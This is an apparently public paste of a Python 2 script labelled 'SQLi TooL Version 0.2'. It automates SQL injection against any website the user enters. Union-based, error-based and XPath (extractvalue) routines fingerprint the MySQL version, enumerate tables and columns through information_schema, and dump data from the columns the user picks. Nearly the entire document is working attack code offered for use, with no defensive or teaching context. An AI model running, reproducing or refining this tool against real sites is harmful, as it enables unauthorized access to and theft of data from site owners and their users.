SQL Injection


SUBMITTED BY: Guest

DATE: May 19, 2013, 1:32 a.m.

FORMAT: Python

SIZE: 23.4 kB

HITS: 2291

  1. from bs4 import BeautifulSoup
  2. import urllib, urllib2, re, webbrowser, sys, os, time, string
  3. class App(object):
  4. def Clean(self):
  5. if sys.platform == 'linux':
  6. clear = 'clear'
  7. elif sys.platform == 'win32':
  8. clear = 'cls'
  9. os.system(clear)
  10. def Routine(self):
  11. equals = '='
  12. print("Enter the site:")
  13. global site
  14. site = raw_input(">>> ")
  15. if site == 'exit':
  16. exit
  17. while 'www' and 'http://' and '.' not in site:
  18. print("[!] Please enter a valid site!")
  19. site = raw_input(">>> ")
  20. print("[=============================]")
  21. while site == int():
  22. print("[!] You entered an integer.Please enter the site")
  23. site = raw_input(">>> ")
  24. print("[===============================================]")
  25. if site[:4] != "http":
  26. site = "http://"+ str(site)
  27. if equals in site:
  28. site = site.replace("=", "=-")
  29. if site.endswith("/*"):
  30. site = site.rstrip('/*')
  31. if site.endswith("#"):
  32. site = site.rstrip("#")
  33. def UnionBased(self):
  34. eqmin = '=-'
  35. equals = '='
  36. print("")
  37. print(" [Union Based]")
  38. print("---------------")
  39. self.Routine()
  40. print(" [!] Getting column count...")
  41. print("")
  42. global site
  43. site = site.replace('=-', '=')
  44. for i in range(2,30):
  45. url = site + '+order+by+%s--' % (i)
  46. URL = urllib.urlopen(url)
  47. Html = URL.read()
  48. soup = BeautifulSoup("".join(Html))
  49. bsoup = soup.findAll('', text = True)
  50. bsoup = str(bsoup)
  51. bsoup = re.sub('<[^<]+?>', '', bsoup)
  52. search = re.search("You have an error", bsoup)
  53. search2 = re.search("Unknown column", bsoup)
  54. search3 = re.search("Error", bsoup)
  55. search4 = re.search("SQL", bsoup)
  56. if search == None and search2 == None and search3 == None and search4 == None:
  57. pass
  58. else:
  59. I = i - 1
  60. print("Column count is: " + str(I))
  61. break
  62. site = site.replace('=', '=-')
  63. print("[==================]")
  64. print(" [!] Getting vulnerable columns...")
  65. ColumnS = ','.join([str(y) for y in range(1,i)])
  66. url = site + '+union+select+%s--' % (ColumnS)
  67. URL = urllib.urlopen(url)
  68. Html = URL.read()
  69. vul = re.findall(r'<[^<]+?>\d+<[^<]+?>', Html)
  70. vul = str(vul)
  71. vul = re.sub('<.*?>',"", vul)
  72. vul = re.sub("'", "", vul)
  73. vul = re.sub('"', "", vul)
  74. vul = vul.strip('[')
  75. vul = vul.strip(']')
  76. print("[====================]")
  77. print("Vulnerable Colums: " + vul)
  78. print("")
  79. print("Select vulnerable column to test for db version:")
  80. ColumnS = ColumnS.replace(raw_input((">>> ")),'@@version')
  81. if ColumnS == '-n' or ColumnS == 'n':
  82. new = 2
  83. url = url
  84. webbrowser.open(url,new=new)
  85. url = site + '+union+select+%s--' % (ColumnS)
  86. URL = urllib.urlopen(url)
  87. Html = URL.read()
  88. db = re.findall(r'<[^<]+?>\d+<[^<]+?>', Html)
  89. search = re.findall('5.0', Html)
  90. search2 = re.findall('4.0.', Html)
  91. search3 = re.findall('5.1.', Html)
  92. db = '5.0'
  93. db2 = '4.0'
  94. db3 = '5.1.'
  95. if db in search:
  96. print("DB Server: MySQL >=5")
  97. if db2 in search2:
  98. print("DB Server: MySQL >=4")
  99. if db3 in search3:
  100. print("DB Server: MySQL >=5.1")
  101. print("")
  102. print(" [!] Getting Tables...")
  103. url = url.rstrip('--')
  104. URL = url.replace("@@version","group_concat(table_name,0x0a)") + '+from+information_schema.tables+where+table_schema=database()--'
  105. REQ = urllib.urlopen(URL)
  106. Html = REQ.read()
  107. tblSearch = re.findall("(\w+\s*,\s*\w+\s*(?:,\s*\w+\s*)*)", Html)
  108. tblSearch = str(tblSearch)
  109. tblSearch = re.sub('<.*?>',"", tblSearch)
  110. tblSearch = re.sub('<[^<]+?>', '', tblSearch)
  111. tblSearch = re.sub('<[^>]*>', '', tblSearch)
  112. tblSearch = re.sub(r'\\n', '', tblSearch)
  113. tblSearch = re.sub("'", "", tblSearch)
  114. tblSearch = re.sub('\\\\', '', tblSearch)
  115. tblSearch = tblSearch.strip('[')
  116. tblSearch = tblSearch.strip(']')
  117. print("[====================]")
  118. print("Tables Found: " + tblSearch)
  119. print("")
  120. print("Enter the table to inject")
  121. Tbl = raw_input('>>> ')
  122. if Tbl == '-n' or Tbl == 'n':
  123. print("")
  124. print(" [!] Redirecting in browser...")
  125. print("[============================]")
  126. new = 2
  127. url = URL
  128. webbrowser.open(url,new=new)
  129. while Tbl == int():
  130. print("[===========================================================]")
  131. print("[!] Please enter a string [or press n to redirect in browser]!")
  132. Tbl = raw_input(">>> ")
  133. Encoded = ','.join(str(ord(i)) for i in Tbl)
  134. URL = url.rstrip('--')
  135. URL = url.replace("@@version", "group_concat(column_name,0x0a)") + '+from+information_schema.columns+where+table_name=char(%s)--' % (Encoded)
  136. REQ = urllib.urlopen(URL)
  137. Html = REQ.read()
  138. colSearch = re.findall("(\w+\s*,\s*\w+\s*(?:,\s*\w+\s*)*)", Html)
  139. colSearch = str(colSearch)
  140. colSearch = re.sub('<.*?>',"", colSearch)
  141. colSearch = re.sub('<[^<]+?>', '', colSearch)
  142. colSearch = re.sub('<[^>]*>', '', colSearch)
  143. colSearch = re.sub(r'\\n', '', colSearch)
  144. colSearch = re.sub("'", "", colSearch)
  145. colSearch = re.sub('\\\\', '', colSearch)
  146. print("[====================]")
  147. print("Columns Found: " + colSearch)
  148. print("")
  149. print("Enter the columns to inject")
  150. Col1 = raw_input('Col #1 >>> ')
  151. Col2 = raw_input('Col #2 >>> ')
  152. if Col1 == '-n' or Col1 == 'n' or Col2 == '-n' or Col2 == 'n':
  153. print("")
  154. print("[!] Redirecting in browser...")
  155. print("[===========================]")
  156. new = 2
  157. url = URL
  158. webbrowser.open(url,new=new)
  159. print("[===============================]")
  160. print(" [!] Getting data from columns...")
  161. URL = url.rstrip('--')
  162. URL = url.replace('@@version', 'group_concat(%s,0x7e,%s)') % (Col1, Col2)
  163. URL = URL + '+from+%s--' % (Tbl)
  164. print URL
  165. REQ = urllib.urlopen(URL)
  166. Html = REQ.read()
  167. DataSearch = re.findall("(.*?)~(.*?),(.*?)", Html)
  168. DataSearch = str(DataSearch)
  169. DataSearch = re.sub('<.*?>',"", DataSearch)
  170. DataSearch = re.sub('<[^<]+?>', '', DataSearch)
  171. DataSearch = re.sub('<[^>]*>', '', DataSearch)
  172. DataSearch = re.sub(r'\\n', '', DataSearch)
  173. DataSearch = re.sub("'", "", DataSearch)
  174. DataSearch = re.sub('\\\\', '', DataSearch)
  175. if DataSearch == '[]':
  176. DataSearch = re.findall("(.*?)~(.*)", Html)
  177. print("[====================]")
  178. print("Data Found(%s,%s): " + str(DataSearch)) % (Col1, Col2)
  179. print("[===================]")
  180. print("No more Data to dump!")
  181. print("[===================]")
  182. print("Hit ENTER to restart. \n'n' to redirect in browser for data search. \n'exit' to exit.")
  183. end = raw_input(">>> ")
  184. if end == '-n' or end == 'n':
  185. new = 2
  186. url = URL
  187. webbrowser.open(url,new=new)
  188. elif end == 'exit':
  189. sys.exit()
  190. else:
  191. run = App()
  192. run.Clean()
  193. run.main()
  194. def ErrorBased(self):
  195. print("")
  196. print(" [Error Based] ")
  197. print("---------------")
  198. self.Routine()
  199. print("[!] Trying Error Based Method...")
  200. minus = '=-'
  201. global site
  202. for minus in site:
  203. site = site.replace("=-", "=")
  204. url = site + '+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--'
  205. URL = urllib.urlopen(url)
  206. Html = URL.read()
  207. soup = BeautifulSoup("".join(Html))
  208. bsoup = soup.findAll('', text = True)
  209. bsoup = str(bsoup)
  210. bsoup = re.sub('<[^<]+?>', '', bsoup)
  211. searching = re.search("Duplicate entry '5.1", bsoup)
  212. searching2 = re.search("Duplicate entry '5", bsoup)
  213. if searching == None and searching2 == None:
  214. print("DB Server: MySQL >=4")
  215. elif searching == None:
  216. print("DB Server: MySQL >=5")
  217. else:
  218. print("DB Server: MySQL >=5.1")
  219. url = site + '+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(database()+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)'
  220. URL = urllib.urlopen(url)
  221. Html = URL.read()
  222. m = re.compile("'(.*?)~1'").search(Html)
  223. soup = BeautifulSoup("".join(Html))
  224. bsoup = soup.findAll('', text = True)
  225. bsoup = str(bsoup)
  226. bsoup = re.sub('<[^<]+?>', '', bsoup)
  227. find = re.findall("'([^']*)'", bsoup)
  228. find = str(find)
  229. find = re.sub("'", "", find)
  230. find = re.sub("~1", "", find)
  231. find = re.sub(",", "", find)
  232. dbname = str(find)
  233. dbname = dbname.strip('[')
  234. dbname = dbname.strip(']')
  235. try:
  236. mgr = m.group(1)
  237. except AttributeError:
  238. print("")
  239. print("Website does not seem to be vulnerable to Error Based Method!")
  240. print("Restarting in 5...")
  241. time.sleep(5)
  242. run = App()
  243. run.Clean()
  244. run.main()
  245. print("")
  246. print("DB Name: " + m.group(1))
  247. print("")
  248. print(" [!] Getting tables from DB...")
  249. for i in range(0,71):
  250. url = site + '+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+limit+%s,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)' % (i)
  251. URL = urllib.urlopen(url)
  252. Html = URL.read()
  253. s = re.compile("'(.*?)~1'").search(Html)
  254. Html = re.sub('~1', '', Html)
  255. soup = BeautifulSoup("".join(Html))
  256. bsoup = soup.findAll('', text = True)
  257. bsoup = str(bsoup)
  258. bsoup = re.sub('<[^<]+?>', '', bsoup)
  259. find = re.findall("'([^']*)'", bsoup)
  260. find = list(find)
  261. Find = str(find[-1])
  262. if Find == '\n' or Find == '\\n' or Find == ', u':
  263. print("[============================]")
  264. print(" [!] There are no more tables to find!")
  265. break
  266. print("[============================]")
  267. print("Found table: " + s.group(1))
  268. print("[=======================]")
  269. print("Enter the table to inject")
  270. tbl = raw_input(">>> ")
  271. Tbl = tbl.encode('hex')
  272. for i in range(0,23):
  273. url = site + '+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7e))+from+information_schema.columns+where+table_name=0x%s+limit+%s,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)' % (Tbl, i)
  274. URL = urllib.urlopen(url)
  275. Html = URL.read()
  276. s = re.compile("'(.*?)~1'").search(Html)
  277. Html = re.sub('~1', '', Html)
  278. soup = BeautifulSoup("".join(Html))
  279. bsoup = soup.findAll('', text = True)
  280. bsoup = str(bsoup)
  281. bsoup = re.sub('<[^<]+?>', '', bsoup)
  282. find = re.findall("'([^']*)'", bsoup)
  283. find = list(find)
  284. Find = str(find[-1])
  285. if Find == '\n' or Find == '\\n' or Find == ', u':
  286. print("[============================]")
  287. print(" [!] There are no more columns to find!")
  288. break
  289. print("[============================]")
  290. print("Found column: " + s.group(1))
  291. print("[============================]")
  292. print("Enter the columns to inject")
  293. col1 = raw_input("Col #1 >>> ")
  294. col2 = raw_input("Col #2 >>> ")
  295. dbname = dbname.strip('[')
  296. dbname = dbname.strip(']')
  297. for i in range(0,23):
  298. url = site + '+and(select+1+from(select+count(*),concat((select+(select(SELECT+concat(0x7e,0x27,cast(%s.%s+as+char),0x27,0x7e)+FROM+`%s`.%s+LIMIT+%s,1)+)+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1' % (tbl, col1, mgr, tbl, i)
  299. URL = urllib.urlopen(url)
  300. Html = URL.read()
  301. m = re.compile("'(.*?)'~1'").search(Html)
  302. Html = re.sub('~1', '', Html)
  303. soup = BeautifulSoup("".join(Html))
  304. bsoup = soup.findAll('', text = True)
  305. bsoup = str(bsoup)
  306. bsoup = re.sub('<[^<]+?>', '', bsoup)
  307. find = re.findall("'([^']*)'", bsoup)
  308. find = list(find)
  309. Find = str(find[-1])
  310. if Find == '\n' or Find == '\\n' or Find == ', u':
  311. print("[============================]")
  312. print(" [!] There is no more data to dump from %s!") % col1
  313. break
  314. print("[============================]")
  315. print("Data from %s: " + m.group(0)) % col1
  316. for i in range(0,23):
  317. url = site + '+and(select+1+from(select+count(*),concat((select+(select(SELECT+concat(0x7e,0x27,cast(%s.%s+as+char),0x27,0x7e)+FROM+`%s`.%s+LIMIT+%s,1)+)+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1' % (tbl, col2, mgr, tbl, i)
  318. URL = urllib.urlopen(url)
  319. Html = URL.read()
  320. s = re.compile("'(.*?)'~1'").search(Html)
  321. Html = re.sub('~1', '', Html)
  322. soup = BeautifulSoup("".join(Html))
  323. bsoup = soup.findAll('', text = True)
  324. bsoup = str(bsoup)
  325. bsoup = re.sub('<[^<]+?>', '', bsoup)
  326. find = re.findall("'([^']*)'", bsoup)
  327. find = list(find)
  328. Find = str(find[-1])
  329. if Find == '\n' or Find == '\\n' or Find == ', u':
  330. print("[============================")
  331. print(" [!] There is no more data to dump from %s!") % col2
  332. break
  333. print("[============================]")
  334. print("Data from %s: " + s.group(0)) % col2
  335. print("No more Data to dump!")
  336. print("[===================]")
  337. print("Hit ENTER to restart.\n'exit' to exit.")
  338. end = raw_input(">>> ")
  339. if end == 'exit':
  340. sys.exit()
  341. else:
  342. run = App()
  343. run.Clean()
  344. run.main()
  345. def Xpath(self):
  346. print("")
  347. print(" [XPath Injection] ")
  348. print("-------------------")
  349. self.Routine()
  350. minus = '=-'
  351. global site
  352. for minus in site:
  353. site = site.replace("=-", "=")
  354. url = site + '+and+extractvalue(rand(),concat(0x7e,version()))--'
  355. URL = urllib.urlopen(url)
  356. Html = URL.read()
  357. soup = BeautifulSoup("".join(Html))
  358. bsoup = soup.findAll('', text = True)
  359. bsoup = str(bsoup)
  360. bsoup = re.sub('<[^<]+?>', '', bsoup)
  361. searching = re.search("XPATH syntax", bsoup)
  362. if searching == None:
  363. print(" [!] Website does not seem to be vulnerable to XPath!")
  364. print(" [!] Restarting in 5...")
  365. time.sleep(5)
  366. run = App()
  367. run.Clean()
  368. run.main()
  369. else:
  370. print("DB Server: MySQL >=5.1")
  371. print("[=====================]")
  372. for i in range(0,71):
  373. url = site + '+and+extractvalue(rand(),concat(0x0a,(select+concat(0x3a,table_name)+from+information_schema.tables+WHERE+table_schema=database()+limit+%s,1)))--' % (i)
  374. URL = urllib.urlopen(url)
  375. Html = URL.read()
  376. m = re.compile(":\s'\n:(.*?)'").search(Html)
  377. Html = re.sub('~', '', Html)
  378. search = re.search('You have an', Html)
  379. search2 = re.search('XPATH', Html)
  380. if search != None or search2 == None:
  381. print("")
  382. print(" [!] There are no more tables to find!")
  383. print("[====================================]")
  384. break
  385. print("Found table: " + m.group(1))
  386. print("[=========================]")
  387. print("Enter the table to inject ")
  388. tbl = raw_input(">>> ")
  389. Tbl = tbl.encode('hex')
  390. for i in range(0,23):
  391. url = site + '+and+extractvalue(rand(),concat(0x0a,(select+concat(0x3a,column_name)+from+information_schema.columns+where+table_name=0x%s+limit+%s,1)))--+x' % (Tbl, i)
  392. URL = urllib.urlopen(url)
  393. Html = URL.read()
  394. m = re.compile(":\s'\n:(.*?)'").search(Html)
  395. Html = re.sub('~', '', Html)
  396. search = re.search('You have an', Html)
  397. search2 = re.search('XPATH', Html)
  398. if search != None or search2 == None:
  399. print("")
  400. print(" [!] There are no more columns to find!")
  401. print("[=====================================]")
  402. break
  403. print("Found column: " + m.group(1))
  404. print("[==========================]")
  405. print("Enter the columns to inject ")
  406. Col1 = raw_input("Col #1>>> ")
  407. Col2 = raw_input("Col #2>>> ")
  408. for i in range(0,23):
  409. url = site + '+and+extractvalue(rand(),concat(0x3a,(select+concat(%s,0x3a,%s)+from+%s+limit+%s,1)))--+x' % (Col1, Col2, tbl, i)
  410. URL = urllib.urlopen(url)
  411. Html = URL.read()
  412. m = re.compile(":\s':(.*?):(.*?)'").search(Html)
  413. search = re.search('You have an', Html)
  414. search2 = re.search('XPATH', Html)
  415. if search != None or search2 == None:
  416. print("")
  417. print(" [!] There is no more data to dump!")
  418. print("[=================================]")
  419. break
  420. print("[-----------%s:%s------------]") % (Col1, Col2)
  421. print("Found Data" + m.group())
  422. print("[==========================]")
  423. print("No more Data to dump!")
  424. print("[===================]")
  425. print("Hit ENTER to restart.\n'exit' to exit.")
  426. end = raw_input(">>> ")
  427. if end == 'exit':
  428. sys.exit()
  429. else:
  430. run = App()
  431. run.Clean()
  432. run.main()
  433. def main(self):
  434. self.Clean()
  435. print(" +========================+ ")
  436. print(" | SQLi TooL Version 0.2 | ")
  437. print(" | Help : -help | ")
  438. print(" | Coded by : 5K0N4 | ")
  439. print(" +========================+ ")
  440. print(" +========================+ ")
  441. print(" |_____Choose Method______| ")
  442. print(" |-----[1]Union Based-----| ")
  443. print(" |---[2]XPath Injection---| ")
  444. print(" |-----[3]Error Based-----| ")
  445. print(" +========================+ ")
  446. choice = raw_input(">>> ")
  447. while choice !='1' and choice !='2' and choice != '3' and choice !='-h' and choice !='-help' and choice != 'exit':
  448. print("Please enter a valid option [-h for help]!")
  449. choice = raw_input(">>> ")
  450. if choice == 'exit':
  451. sys.exit()
  452. elif choice == '-help' or choice == '-h':
  453. print("=======================")
  454. print("Union Based: ")
  455. print("")
  456. print("If the program didn't find anything usefull you can \npress '-n' or 'n' to redirect in browser to seach manually!")
  457. print("[---------------------------------------------------------]")
  458. print("Also there's a bug in 'Tables Found:','Columns Found:' and 'Data Found:' - \nBeware that some of those won't be valid tables\\columns but html elements!")
  459. print("[------------------------------------------------------------------------]")
  460. print("Hit ENTER to restart")
  461. restart = raw_input(">>> ")
  462. run = App()
  463. run.main()
  464. if choice == '1':
  465. self.Clean()
  466. self.UnionBased()
  467. elif choice == '2':
  468. self.Clean()
  469. self.Xpath()
  470. elif choice == '3':
  471. self.Clean()
  472. self.ErrorBased()
  473. if __name__ == '__main__':
  474. run = App()
  475. run.main()

comments powered by Disqus